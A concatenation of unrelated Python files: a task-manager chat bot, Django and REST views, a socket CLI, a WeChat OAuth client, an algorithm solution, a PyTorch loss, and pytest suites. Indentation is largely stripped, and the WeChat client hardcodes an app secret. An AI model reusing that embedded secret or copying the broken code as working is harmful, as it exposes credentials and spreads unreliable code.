mondayDateNumber = chrono.getDateNumberNDaysFromMonday(0, UTCDiffInSeconds)
sundayDateNumber = chrono.getDateNumberNDaysFromMonday(6, UTCDiffInSeconds)
for i, task in enumerate(tasklist):
# Insert Today bar
if (i+1 <= TASK_NUMBER_LIMIT or full_list_mode) or task.new:
if not today_bar_exists and task.date > todayDateNumber:
today_bar_exists = 1
tasklist_string = '{}<b>***({}) {} {}, {} hrs***</b>\n'.format(tasklist_string,
todayDelta.strftime('%a'), # Mon, Tue
todayDelta.strftime('%d'), # 1-30
todayDelta.strftime('%b'), # Jan, Feb
todayDelta.strftime("%H:%M")) # 14:35
# Insert End of week bar
if end_of_week_bar_exists:
pass
elif not end_of_week_bar_exists and task.date > mondayDateNumber and task.date <= sundayDateNumber:
end_of_week_bar_needed = 1
elif end_of_week_bar_needed and task.date > sundayDateNumber:
tasklist_string = '{}----------<i>End of Week</i>----------\n'.format(tasklist_string)
end_of_week_bar_exists = 1
tasklist_string = '{}<b>{}</b>.{}{} {}{}{}{}\n'.format(tasklist_string,
str(i + 1),
chrono.getNiceDate(task.date, UTCDiffInSeconds),
task.getTime(),
task.getName(),
task.getLocation(),
get_link_string(task.linkList),
task.getImportant())
# Trim list if not full_list_mode
if i+1 == TASK_NUMBER_LIMIT and not full_list_mode:
tasklist_string = '{}<b>{}</b>. ... [/show_all]\n'.format(tasklist_string, str(i+2))
tasklist_string = reverse_order(tasklist_string)
logger.debug('Generate tasklist_string ended')
return tasklist_string
def task_match(task, search_task):
task_name = task.name.lower()
search_text = search_task.name.lower()
task_name = ' {}'.format(task_name)
search_text = ' {}'.format(search_text)
if task_name.find(search_text) == -1: return 0
if search_task.date and not task.date == search_task.date: return 0
return 1
def reverse_order(message):
messageList = message.split('\n')
messageList.reverse()
    newMessage = '\n'.join(messageList)
return newMessage
def get_link_string(linkList, type = 'shortened'):
if len(linkList) == 0:
return ''
linkString = ''
if type == 'shortened':
for i, link in enumerate(linkList):
linkString += '(<a href="{}">{}</a>)'.format(link, trim_link(link))
else:
for i, link in enumerate(linkList):
linkString += ' {} '.format(link)
return linkString
def trim_link(link):
if link[:5] == 'https':
link = link[8:]
elif link[:4] == 'http':
link = link[7:]
if link[:4] == 'www.':
link = link[4:]
if len(link[:4]) < 1:
return 'invalid_link'
return link[:4]+'...'
def get_nice_recurring_date(task):
if task.recurringString == 'every_year':
return 'Every {}'.format(chrono.getNiceRecurringDate(task.date, task.recurringInteger))
elif task.recurringString == 'every_month':
if task.recurringInteger == 1:
return 'Every 1st'
if task.recurringInteger == 2:
return 'Every 2nd'
if task.recurringInteger == 3:
return 'Every 3rd'
else:
return 'Every {}th'.format(task.recurringInteger)
else:
return task.recurringString.replace('_',' ').title()
def attach(messageList, message, id, command):
if messageList:
message = '{}\n-----'.format(message)
for line in messageList:
message = '{}\n{}'.format(message, line)
message = '{}\n[/refresh] [/recurring_tasks]'.format(message)
return message
def get_date_string():
today_UTC = datetime.datetime.now()
today_singapore = today_UTC + datetime.timedelta(seconds=28800)
year_str = today_singapore.strftime('%Y')
month_str = today_singapore.strftime('%m')
day_str = today_singapore.strftime('%d')
return '{}{}{}'.format(year_str, month_str, day_str)
def bold_term(string, search_term):
index = ' {}'.format(string.lower()).find(' {}'.format(search_term.lower()))
print('"{}" found in "{}" at position {}'.format(search_term, string, index))
if index == -1: return string
return '{}<b>{}</b>{}'.format(string[:index], string[index:index + len(search_term)], string[index + len(search_term):])
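# Illustrative note (added): bold_term() only matches at word starts, since
# both strings get a leading space before the find, and it preserves the
# original casing of the matched span, e.g.
#     bold_term('Buy Milk today', 'milk')  ->  'Buy <b>Milk</b> today'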
################
# LONG STRINGS #
################
set_timezone_message = """Hi New User! Set your Timezone first by sharing your current time with me!
<b>Type:</b> mytime [Your Current Time and Date]
<b>e.g.</b> mytime 11am 25may
<b>e.g.</b> mytime 1125am 25may
<b>e.g.</b> mytime 1pm 25may
<b>e.g.</b> mytime 130pm 25may"""
welcome_message_string = """Welcome to DoMe Task Manager!
<i>Just type in a command! (No "/" needed.)</i>
<b>1) Adding Tasks</b> [Optional Arguments]
eg. <i>Go swimming at pool tmr 8am</i>
<b>Syntax:</b> Task_Name [date][time][location][link][!]
<b>Acceptable Formats</b> (not case-sensitive)
Date: <i>17apr, 17 apr, 17 april, 17 april 2003</i>
Time: <i>7pm, 745pm, 11am</i>
Location: <i>at ang mo kio, @ang_mo_kio</i>
Link: <i>http..., www...</i>
<b>2) Deleting Tasks</b>
eg. delete 10 / d 10 / d10
eg. d 3 1 6 2
<b>3) Refresh Current Tasks</b>
eg. refresh / ref / list / ls
<b>4) Edit Tasks</b>
eg. edit 3 <i>something new</i>
eg. e 12 <i>19 feb</i>
eg. e 15 <i>something new 19 feb</i>
<b>5) Append</b>
eg. append 5 more_info at location2
eg. app 5 more_info at LOC_2
<b>Result:</b> Task, <i>more_info @LOC_1/LOC_2</i>
<b>6) Change Timezone</b>
eg. mytime 1125pm 25may
<b>7) Search</b>
eg. s things to buy
<b>8) Undo</b> (Only 1 undo supported)
eg. undo, u
"""
empty_tasklist_string = """- List is empty! -
Just type a task and send!
For example: <b>Buy a goat 17 dec</b>.
See /help for more options."""
#####################
# RUN MAIN FUNCTION #
#####################
if __name__ == '__main__':
main() |
#from django.forms import ModelForm, fields
from django import forms
from person.models import ImapServer, SmtpServer
class ImapServerForm(forms.ModelForm):
class Meta:
        model = ImapServer
        fields = '__all__'  # an explicit field list is required on Django >= 1.8
widgets = {
'passwd': forms.PasswordInput(),
}
class SmtpServerForm(forms.ModelForm):
class Meta:
        model = SmtpServer
        fields = '__all__'  # an explicit field list is required on Django >= 1.8
widgets = {
'passwd': forms.PasswordInput(),
}
|
import click
from mysocketctl.utils import *
@click.group()
def socket():
"""Manage your global sockets"""
pass
def get_sockets(authorization_header):
api_answer = requests.get(api_url + "connect", headers=authorization_header)
validate_response(api_answer)
return api_answer.json()
def new_socket(
authorization_header,
connect_name,
protected_socket,
protected_user,
protected_pass,
socket_type,
):
if not protected_socket:
protected_socket = False
else:
protected_socket = True
params = {
"name": connect_name,
"protected_socket": protected_socket,
"protected_username": protected_user,
"protected_password": protected_pass,
"socket_type": socket_type,
}
api_answer = requests.post(
api_url + "socket", data=json.dumps(params), headers=authorization_header
)
validate_response(api_answer)
return api_answer.json()
def delete_socket(authorization_header, socket_id):
api_answer = requests.delete(
api_url + "socket/" + socket_id, headers=authorization_header
)
validate_response(api_answer)
return api_answer
@socket.command()
def ls():
table = PrettyTable(
field_names=["socket_id", "dns_name", "type", "port(s)", "name"]
)
table.align = "l"
table.border = True
authorization_header = get_auth_header()
sockets = get_sockets(authorization_header)
for socket in sockets:
ports_str = listToStr = " ".join(
[str(elem) for elem in socket["socket_tcp_ports"]]
)
row = [
socket["socket_id"],
socket["dnsname"],
socket["socket_type"],
ports_str,
socket["name"],
]
table.add_row(row)
print(table)
@socket.command()
@click.option("--name", required=True, type=str)
@click.option("--protected", required=False, type=str, default="")
@click.option("--protected/--not-protected", default=False)
@click.option("--username", required=False, type=str, default="")
@click.option("--password", required=False, type=str, default="")
@click.option(
"--type",
required=False,
type=str,
default="http",
help="Socket type, http, https, tcp, tls",
)
def create(name, protected, username, password, type):
if protected:
if not username:
print("--username required when using --protected")
sys.exit(1)
if not password:
print("--password required when using --protected")
sys.exit(1)
if not name:
name = ""
if type not in ["http", "https", "tcp", "tls"]:
print("--type should be either http, https, tcp or tls")
sys.exit(1)
authorization_header = get_auth_header()
socket = new_socket(
authorization_header, name, protected, str(username), str(password), str(type)
)
ssh_server = "ssh.mysocket.io"
table = PrettyTable()
table.align = "l"
table.border = True
ports_str = listToStr = " ".join([str(elem) for elem in socket["socket_tcp_ports"]])
table.field_names = ["socket_id", "dns_name", "port(s)", "type", "name"]
if type in ["tcp", "tls"]:
tcp_ports = socket["socket_tcp_ports"]
row = [
socket["socket_id"],
socket["dnsname"],
ports_str,
socket["socket_type"],
socket["name"],
]
else:
row = [
socket["socket_id"],
socket["dnsname"],
ports_str,
socket["socket_type"],
socket["name"],
]
table.add_row(row)
print(table)
if protected:
protectedtable = PrettyTable(field_names=["username", "password"])
protectedtable.align = "l"
protectedtable.border = True
protectedtable.add_row([str(username), str(password)])
print("\nProtected Socket, login details:")
print(protectedtable)
@socket.command()
@click.option("--socket_id", required=True, type=str)
def delete(socket_id):
authorization_header = get_auth_header()
delete_socket(authorization_header, socket_id)
print("Socket " + socket_id + " deleted")
|
from rest_framework import status
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet
from .models import Project, Risk
from .serializers import (ProjectSerializer,
ProjectSerializerForUpdateRequests, RiskSerializer,
RiskSerializerForUpdateRequests)
class ProjectView(ModelViewSet):
"""
Viewset responsible for presenting Project models data
"""
serializer_class = ProjectSerializer
queryset = Project.objects.all()
permission_classes = [IsAuthenticated]
def get_serializer_class(self):
"""
Ensures that the contents of a PUT, POST or PATCH request do not contain the serialized versions of nested
objects.
        :return: either the no-nested-serialization serializer or the default one, depending on the request method
"""
if self.request.method in ["PUT", "POST", "PATCH"]:
return ProjectSerializerForUpdateRequests
else:
return super().get_serializer_class()
def create(self, request, *args, **kwargs):
"""
        Ensures that the response to a POST request is rendered with the full serializer (nested serialization
        included) rather than the one used to parse the request itself.
:param request: HTTP request sent by user
:return: HTTP response from server
"""
serializer = ProjectSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def update(self, request, *args, **kwargs):
"""
        Ensures that the response to a PUT/PATCH request is rendered with the full serializer (nested serialization
        included) rather than the one used to parse the request itself.
:param request: HTTP request sent by user
:return: HTTP response from server
"""
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return_serializer = ProjectSerializer(instance, data=request.data, partial=partial)
return_serializer.is_valid(raise_exception=True)
if getattr(instance, '_prefetched_objects_cache', None):
# If 'prefetch_related' has been applied to a queryset, we need to
# forcibly invalidate the prefetch cache on the instance.
instance._prefetched_objects_cache = {}
return Response(return_serializer.data)
class RiskView(ModelViewSet):
serializer_class = RiskSerializer
queryset = Risk.objects.all()
permission_classes = [IsAuthenticated]
def get_serializer_class(self):
"""
Ensures that the contents of a PUT, POST or PATCH request do not contain the serialized versions of nested
objects.
        :return: either the no-nested-serialization serializer or the default one, depending on the request method
"""
if self.request.method in ["PUT", "POST", "PATCH"]:
return RiskSerializerForUpdateRequests
else:
return super().get_serializer_class()
def create(self, request, *args, **kwargs):
"""
        Ensures that the response to a POST request is rendered with the full serializer (nested serialization
        included) rather than the one used to parse the request itself.
:param request: HTTP request sent by user
:return: HTTP response from server
"""
serializer = RiskSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def update(self, request, *args, **kwargs):
"""
        Ensures that the response to a PUT/PATCH request is rendered with the full serializer (nested serialization
        included) rather than the one used to parse the request itself.
:param request: HTTP request sent by user
:return: HTTP response from server
"""
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return_serializer = RiskSerializer(instance)
if getattr(instance, '_prefetched_objects_cache', None):
# If 'prefetch_related' has been applied to a queryset, we need to
# forcibly invalidate the prefetch cache on the instance.
instance._prefetched_objects_cache = {}
return Response(return_serializer.data)
|
import urllib.request
import json
class ab_User():
def __init__(self):
self.appId = 'wxff3cfebbdcbcd135'
self.appScrect = 'b9774614f15c56e6e42884ff84ee5168'
def getOpenId(self, code):
        getUrl = 'https://api.weixin.qq.com/sns/oauth2/access_token?appid=%s&secret=%s&code=%s&grant_type=authorization_code' % (
self.appId, self.appScrect, code)
urlResp = urllib.request.urlopen(getUrl)
urlResp = json.loads(urlResp.read().decode('utf-8'))
return urlResp
def getUserInfo(self, access_token, openId):
getUrl = 'https://api.weixin.qq.com/sns/userinfo?access_token=%s&openid=%s&lang=zh_CN' % (
access_token, openId)
urlResp = urllib.request.urlopen(getUrl)
urlResp = json.loads(urlResp.read().decode('utf-8'))
return urlResp
def getWage(self,id):
pass
|
"""
498. Diagonal Traverse
Given a matrix of M x N elements (M rows, N columns), return all elements of the matrix in diagonal (zig-zag) order, alternating between up-right and down-left passes along the anti-diagonals starting from the top-left element (the original problem statement illustrates this with an image).
Example:
Input:
[
[ 1, 2, 3 ],
[ 4, 5, 6 ],
[ 7, 8, 9 ]
]
Output: [1,2,4,7,5,3,6,8,9]
Note:
The total number of elements of the given matrix will not exceed 10,000.
"""
class Solution(object):
def findDiagonalOrder(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[int]
"""
if len(matrix) == 0:
return []
row = 0
col = 0
m = len(matrix)
n = len(matrix[0])
aimArr = []
i = 0
while i < m * n:
aimArr.append(matrix[row][col])
if (row + col) % 2 == 0:
if col == n - 1:
row += 1
elif row == 0:
col += 1
else:
row -= 1
col += 1
else:
if row == m - 1:
col += 1
elif col == 0:
row += 1
else:
row += 1
col -= 1
i += 1
return aimArr
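# Quick illustrative check (added; mirrors the example in the docstring above).
if __name__ == "__main__":  # pragma: no cover
    assert Solution().findDiagonalOrder(
        [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    ) == [1, 2, 4, 7, 5, 3, 6, 8, 9]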
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
def evaluate(model, data_loader, metrics, device):
if model.training:
model.eval()
summary = {metric: 0 for metric in metrics}
for step, mb in tqdm(enumerate(data_loader), desc='steps', total=len(data_loader)):
x_mb, y_mb = map(lambda elm: elm.to(device), mb)
with torch.no_grad():
y_hat_mb, _ = model(x_mb)
for metric in metrics:
summary[metric] += metrics[metric](y_hat_mb, y_mb).item() * y_mb.size()[0]
    else:  # for-else: runs once the loop completes; normalise accumulated sums by dataset size
for metric in metrics:
summary[metric] /= len(data_loader.dataset)
return summary
def acc(yhat, y):
with torch.no_grad():
yhat = yhat.max(dim=1)[1]
acc = (yhat == y).float().mean()
return acc
def entropy(probs):
    return -torch.sum(probs * torch.log(probs), dim=-1)  # H(p) = -sum p * log p
class LSR(nn.Module):
def __init__(self, epsilon=.1, num_classes=162):
super(LSR, self).__init__()
self._epsilon = epsilon
self._num_classes = num_classes
def forward(self, yhat, y):
prior = torch.div(torch.ones_like(yhat), self._num_classes)
loss = F.cross_entropy(yhat, y, reduction='none')
reg = (-1 * F.log_softmax(yhat, dim=-1) * prior).sum(-1)
total = (1 - self._epsilon) * loss + self._epsilon * reg
lsr_loss = total.mean()
return lsr_loss
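# Minimal usage sketch (added for illustration; the batch size and shapes are
# arbitrary assumptions): LSR mixes standard cross-entropy with a penalty
# against a uniform prior over the classes, weighted by epsilon.
def _example_lsr():  # pragma: no cover
    criterion = LSR(epsilon=0.1, num_classes=162)
    logits = torch.randn(8, 162)            # unnormalised scores for 8 samples
    targets = torch.randint(0, 162, (8,))   # integer class labels
    return criterion(logits, targets)       # scalar label-smoothed loss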
|
import pytest
from cognigraph.nodes.processors import Beamformer
from cognigraph.nodes.sources import FileSource
from cognigraph.nodes.tests.prepare_tests_data import (info, # noqa
fwd_model_path,
data_path)
import numpy as np
@pytest.fixture(scope='function') # noqa
def beamformer(info, fwd_model_path, data_path): # noqa
is_adaptive = True
beamformer = Beamformer(fwd_path=fwd_model_path,
is_adaptive=is_adaptive)
beamformer.mne_info = info
N_SEN = len(info['ch_names'])
beamformer.input = np.random.rand(N_SEN)
parent = FileSource(data_path)
parent.output = np.random.rand(info['nchan'], 1)
parent.mne_info = info
beamformer.parent = parent
return beamformer
@pytest.fixture # noqa
def beamformer_default(info): # noqa
beamformer_default = Beamformer()
parent = FileSource()
parent.mne_info = info
parent.output = np.random.rand(info['nchan'], 1)
beamformer_default.parent = parent
return beamformer_default
def test_defaults(beamformer_default):
assert beamformer_default.fwd_path is None
assert beamformer_default.mne_info is None
def test_initialize(beamformer):
beamformer.initialize()
assert hasattr(beamformer, '_filters')
assert beamformer.mne_info is not None
def test_reg_change(beamformer):
"""
Change regulariation parameter and see if filters changed but
covariance matrix didn't reset to default
"""
beamformer.initialize()
    # -------- modify covariance so it's not equal to initial -------- #
nchans = beamformer._upstream_mne_info['nchan']
ntimes = 100
beamformer._update_covariance_matrix(np.random.rand(nchans, ntimes))
# --------------------------------------------------------------- #
data_cov_old = beamformer._data_cov.data
filters_old = beamformer._filters.copy()
beamformer.reg = 5
beamformer.reset()
assert not np.array_equal(filters_old, beamformer._filters)
assert np.array_equal(beamformer._data_cov.data, data_cov_old)
def test_adaptiveness_change(beamformer):
"""
Change is_adaptive and see if reinitialization happens
"""
beamformer.is_adaptive = True
beamformer.initialize()
data_cov_init = beamformer._data_cov.data
    # -------- modify covariance so it's not equal to initial -------- #
nchans = beamformer._upstream_mne_info['nchan']
ntimes = 100
beamformer._update_covariance_matrix(np.random.rand(nchans, ntimes))
# --------------------------------------------------------------- #
filters = beamformer._filters.copy()
beamformer.is_adaptive = False
beamformer.update()
assert not np.array_equal(filters, beamformer._filters)
assert np.array_equal(beamformer._data_cov.data, data_cov_init)
def test_input_hist_inval_triggers_reinit_for_adaptive_beamformer(beamformer):
beamformer.parent.initialize()
beamformer.initialize()
data_cov_init = beamformer._data_cov.data
    # -------- modify covariance so it's not equal to initial -------- #
nchans = beamformer._upstream_mne_info['nchan']
ntimes = 100
beamformer._update_covariance_matrix(np.random.rand(nchans, ntimes))
# --------------------------------------------------------------- #
filters_old = beamformer._filters.copy()
beamformer._filters = None # mess up the filters
beamformer.on_input_history_invalidation()
assert not np.array_equal(filters_old, beamformer._filters)
assert np.array_equal(beamformer._data_cov.data, data_cov_init)
def test_update(beamformer):
beamformer._initialize()
beamformer._update()
def test_check_value(beamformer):
with pytest.raises(ValueError):
beamformer.reg = -1
|
from pathlib import Path
import pytest
import pybmoore
@pytest.mark.parametrize(
"filename,terms",
[
(
"tests/data/br_constitution.txt",
["Deus", "Brasil"],
),
(
"tests/data/br_constitution.txt",
["Supremo Tribunal Federal", "Emenda Constitucional"],
),
],
)
def test_search_multiple_terms(filename, terms, benchmark):
benchmark(pybmoore.search, terms, Path(filename).read_text())
@pytest.mark.parametrize(
"filename,term",
[
("tests/data/br_constitution.txt", "Lei nº"),
("tests/data/br_constitution.txt", "Supremo Tribunal Federal"),
("tests/data/us_constitution.txt", "Congress"),
("tests/data/us_constitution.txt", "Congress of the United States"),
],
)
def test_search_single_term(filename, term, benchmark):
benchmark(pybmoore.search, term, Path(filename).read_text())
@pytest.mark.parametrize(
"pattern",
[
("algorithm"),
("string-searching"),
("19"),
("The Boyer–Moore"),
("algorithm preprocess"),
],
)
def test_search(pattern, benchmark):
TEXT = "In computer science, the Boyer–Moore string-search algorithm is an efficient string-searching algorithm that is the standard benchmark for practical string-search literature.[1] It was developed by Robert S. Boyer and J Strother Moore in 1977.[2] The original paper contained static tables for computing the pattern shifts without an explanation of how to produce them. The algorithm for producing the tables was published in a follow-on paper; this paper contained errors which were later corrected by Wojciech Rytter in 1980.[3][4] The algorithm preprocesses the string being searched for (the pattern), but not the string being searched in (the text). It is thus well-suited for applications in which the pattern is much shorter than the text or where it persists across multiple searches. The Boyer–Moore algorithm uses information gathered during the preprocess step to skip sections of the text, resulting in a lower constant factor than many other string search algorithms. In general, the algorithm runs faster as the pattern length increases. The key features of the algorithm are to match on the tail of the pattern rather than the head, and to skip along the text in jumps of multiple characters rather than searching every single character in the text."
benchmark(pybmoore.search, pattern, TEXT)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Unit tests about articles' API"""
from logging import DEBUG
import pytest
from marucat_app import create_app
@pytest.fixture
def client():
app = create_app(level=DEBUG, db='test')
app.testing = True
return app.test_client()
def test_get_list(client):
"""Test fetch list"""
def perform_get_list(input_val, expect_val, code=200, tags=None):
"""test template
:param input_val: inputted values (size, offset)
:param expect_val: the expected result (size, offset)
:param code: expected status code
:param tags: tags
"""
# get inputted size and offset
size, offset = input_val if input_val else (None, None)
# make request with query params
# example: /articles/list?size=10&offset=1
requested_url = '/articles{}'.format(
'?{}{}{}'.format(
'size={}'.format(size) if size != '' else '',
'&' if size and offset else '',
'offset={}'.format(offset) if offset != '' else ''
) if size or offset else ''
)
# perform request
r = client.get(requested_url)
print(requested_url, r.status_code)
# check return code
assert code == r.status_code
if 200 == code:
# get expected size and offset
e_size, e_offset = expect_val
# check Content-Type
assert 'application/json' == r.content_type
# check data
fake_data = {
'test_only': 'TESTING',
'size': e_size,
'offset': e_offset,
'tags': tags
}
assert fake_data == r.get_json()[1]
elif 400 == code:
assert r.data
assert r.get_json()['error'] is not None
else:
raise AssertionError(
'Unexpected status code:{}'.format(r.status_code)
)
# 200 below
# default values (size, offset)
default_val = (10, 0)
# default params
perform_get_list(None, default_val)
# specific params
perform_get_list((55, 999), (55, 999))
# error checking
# no val provided to size
perform_get_list(('', 998), (10, 998))
# no val provided to offset
perform_get_list((1098, ''), (1098, 0))
# no val provided to both
perform_get_list(('', ''), default_val)
# 400 below
# invalid val provided
perform_get_list(('abc', 192), None, 400)
perform_get_list((111, 'acb'), None, 400)
perform_get_list((-1, 192), None, 400)
perform_get_list((111, -99), None, 400)
perform_get_list((0, 192), None, 400)
perform_get_list((111, 0), None, 400)
# other errors
# 405 method not allowed
rv = client.post('/articles?size=1&offset=2')
assert 405 == rv.status_code
def test_get_content(client):
"""Test fetch content"""
def perform_get_content(article_id, code=200):
"""Test template"""
url = '/articles/{}'.format(article_id)
r = client.get(url)
print(url, r.status_code)
assert code == r.status_code
if 404 == code:
if article_id == '' or '/' in article_id:
assert not r.data
else:
assert r.data
assert r.get_json()['error'] is not None
else:
r_data = r.get_json()
assert article_id == r_data['aid']
# 200 below
# /article/aidT1234
perform_get_content('T1234')
# 404 without error message feedback below
# /article/aid
# perform_get_content('', 404)
# 404 with error message feedback below
# /article/aidTEST_NOT_FOUND
perform_get_content('TEST_NOT_FOUND', 404)
# special characters
perform_get_content('/', 404)
perform_get_content('abc/ ', 404)
perform_get_content('abc/123', 404)
perform_get_content('asd&123', 404)
perform_get_content('asd+123', 404)
perform_get_content('asd_123', 404)
perform_get_content('asd-123', 404)
perform_get_content('asd"123', 404)
perform_get_content('asd\'123', 404)
# 405 method not allowed
rv = client.patch('/articles/aidTest')
assert 405 == rv.status_code
def test_get_comments(client):
"""Test fetch comments"""
def perform_get_comments(aid, inputted, expect, code=200):
"""Test template
:param aid: article id
:param inputted: inputted values
:param expect: expected result
:param code: status code
"""
size, page = None, None
if inputted is not None:
size, page = inputted
url = '/articles/{}/comments{}'.format(
aid if aid is not None else '',
'?{}{}{}'.format(
'size={}'.format(size) if size is not None else '',
'&' if size is not None and page is not None else '',
'offset={}'.format(page) if page is not None else ''
) if size is not None or page is not None else ''
)
r = client.get(url)
print(url, r.status_code)
assert code == r.status_code
if code == 200:
# get expected size and page
e_size, e_page = expect
# check Content-Type
assert 'application/json' == r.content_type
# check data
data = {
'test_only_aid': aid,
'size': e_size,
'offset': e_page
}
assert data == r.get_json()[1]
elif code == 400 or code == 404:
# check Content-Type
if aid != '' and '/' not in aid:
assert 'application/json' == r.content_type
assert r.get_json()['error'] is not None
else:
assert not r.data
else:
raise AssertionError(
'Unexpected status code:{}'.format(r.status_code)
)
# default values
perform_get_comments('T123', None, (10, 0))
perform_get_comments('DF789', (99, None), (99, 0))
perform_get_comments('090909', (None, 12), (10, 12))
    # normal cases
perform_get_comments('paa', (123, 456), (123, 456))
perform_get_comments('0998100029999123', (11, 12), (11, 12))
# bad parameters
perform_get_comments('', None, None, 404)
perform_get_comments('/', None, None, 404)
perform_get_comments('asd/123', (1, 2), None, 404)
perform_get_comments('asd&123', (3, 4), None, 404)
perform_get_comments('asd+123', None, None, 404)
perform_get_comments('asd-123', None, None, 404)
perform_get_comments('asd_123', (5, 6), None, 404)
perform_get_comments('asd\'123', (7, 8), None, 404)
perform_get_comments('asd"123', None, None, 404)
# bad query parameters
# perform_get_comments('T123', (0, 0), None, 400)
# perform_get_comments('T123', (0, 1), None, 400)
# perform_get_comments('T123', (1, 0), None, 400)
perform_get_comments('T123', (-1, -99), None, 400)
perform_get_comments('T123', (1, -1), None, 400)
perform_get_comments('T123', (-91, 11), None, 400)
# method not allowed
rv = client.put('/articles/aidT123/comments')
assert 405 == rv.status_code
def test_post_comments(client):
def perform_post_comments(article_id, data, code=201):
url = '/articles/{}/comments'.format(article_id)
r = client.post(url, json=data)
print(url, r.status_code)
assert code == r.status_code
if code == 404 or code == 400:
assert 'application/json' == r.content_type
assert r.get_json()['error'] is not None
normally_data = {
'from': 'Richard',
'body': 'Ok!',
'timestamp': 1529658047.974455
}
    # normal case
perform_post_comments('1234', normally_data)
# invalid article ID
perform_post_comments('123$123', normally_data, 404)
perform_post_comments('123"123', normally_data, 404)
perform_post_comments('123+123', normally_data, 404)
perform_post_comments('123-123', normally_data, 404)
perform_post_comments("123'123", normally_data, 404)
# invalid post data
perform_post_comments('test1234', {'from': 'a', 'body': 'b'}, 400)
perform_post_comments('test1234', {'timestamp': 'a', 'body': 'b'}, 400)
perform_post_comments('test1234', {'timestamp': 'a', 'from': 'b'}, 400)
# reply to ok
perform_post_comments('asd123123', {**normally_data, 'reply_to': '12412'})
def test_delete_comment(client):
def perform_delete_comment(article_id, comment_id, code=200):
url = '/articles/{}/comments/{}'.format(
article_id, comment_id
)
r = client.delete(url)
print(url, r.status_code)
assert code == r.status_code
if code == 404:
assert 'application/json' == r.content_type
assert r.get_json()['error'] is not None
    # normal case
perform_delete_comment('aid1234', 'cid1234')
# bad article ID
perform_delete_comment('aid+123', 'cid456', 404)
perform_delete_comment('aid-123', 'cid456', 404)
perform_delete_comment('aid*123', 'cid456', 404)
perform_delete_comment(r'aid\123', 'cid456', 404)
perform_delete_comment('aid"123', 'cid456', 404)
perform_delete_comment('aid123%', 'cid456', 404)
# perform_delete_comment('aid#123', 'cid456', 404)
# perform_delete_comment('aid123#', 'cid456', 404)
perform_delete_comment('aid@123', 'cid456', 404)
perform_delete_comment('aid&123', 'cid456', 404)
perform_delete_comment("aid'123", 'cid456', 404)
# bad comment ID
perform_delete_comment('aid1234', 'cid~123', 404)
perform_delete_comment('aid1234', 'cid!123', 404)
perform_delete_comment('aid1234', 'cid@123', 404)
perform_delete_comment('aid1234', 'cid$123', 404)
perform_delete_comment('aid1234', 'cid123%', 404)
perform_delete_comment('aid1234', 'cid^123', 404)
perform_delete_comment('aid1234', 'cid&123', 404)
perform_delete_comment('aid1234', 'cid*123', 404)
perform_delete_comment('aid1234', 'cid(123', 404)
perform_delete_comment('aid1234', 'cid)123', 404)
perform_delete_comment('aid1234', 'cid[123', 404)
perform_delete_comment('aid1234', 'cid]123', 404)
|
# Copyright (c) 2018-2021, Texas Instruments
# All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import h5py
import scipy.io
import sys
import glob
import random
import numpy as np
import cv2
import PIL
from colorama import Fore
from .. import utils
from .dataset_base import *
class NYUDepthV2(DatasetBase):
def __init__(self, num_classes=151, ignore_label=None, download=False, **kwargs):
super().__init__(num_classes=num_classes, **kwargs)
self.force_download = True if download == 'always' else False
assert 'path' in self.kwargs and 'split' in self.kwargs, 'path and split must be provided'
self.depth_label_scale = 256.0
path = self.kwargs['path']
split = kwargs['split']
if download:
self.download(path, split)
#
self.kwargs['num_frames'] = self.kwargs.get('num_frames', None)
self.name = "NYUDEPTHV2"
self.ignore_label = ignore_label
#self.label_dir_txt = os.path.join(self.kwargs['path'], 'objectInfo150.txt')
image_dir = os.path.join(self.kwargs['path'], self.kwargs['split'], 'images')
images_pattern = os.path.join(image_dir, '*.jpg')
images = glob.glob(images_pattern)
self.imgs = sorted(images)
labels_dir = os.path.join(self.kwargs['path'], self.kwargs['split'], 'annotations')
labels_pattern = os.path.join(labels_dir, '*.png')
labels = glob.glob(labels_pattern)
self.labels = sorted(labels)
        assert len(self.imgs) == len(self.labels), 'mismatch in the number of images and labels'
self.num_frames = min(self.kwargs['num_frames'], len(self.imgs)) \
if (self.kwargs['num_frames'] is not None) else len(self.imgs)
